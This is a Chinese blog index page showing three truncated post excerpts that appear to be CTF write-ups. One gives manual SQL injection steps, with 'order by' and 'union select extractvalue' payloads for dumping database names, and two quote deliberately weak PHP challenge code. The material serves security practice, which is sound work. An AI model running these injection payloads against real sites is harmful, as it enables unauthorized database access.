摘要:
手工sql注入流程 首先,检查字段数 url?wllm=1' order by 3--+ 尝试到4的时候报错,故字段数为3 爆库名 url?wllm=1' union select 1,extractvalue(1,concat('~',(select database()))),3--+ 爆表名 阅读全文
posted @ 2024-02-03 21:41
努力的大魔王
阅读(104)
评论(0)
推荐(0)
摘要:
<?php highlight_file(__FILE__); include 'flag2.php'; if (isset($_GET['name']) && isset($_POST['password'])){ $name = $_GET['name']; $password = $_POST 阅读全文
posted @ 2024-02-03 17:08
努力的大魔王
阅读(163)
评论(0)
推荐(0)
摘要:
源码 <?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['json'],true); if ($id=="wllmNB"&&$json['x']=="wl 阅读全文
posted @ 2024-02-03 16:36
努力的大魔王
阅读(73)
评论(0)
推荐(0)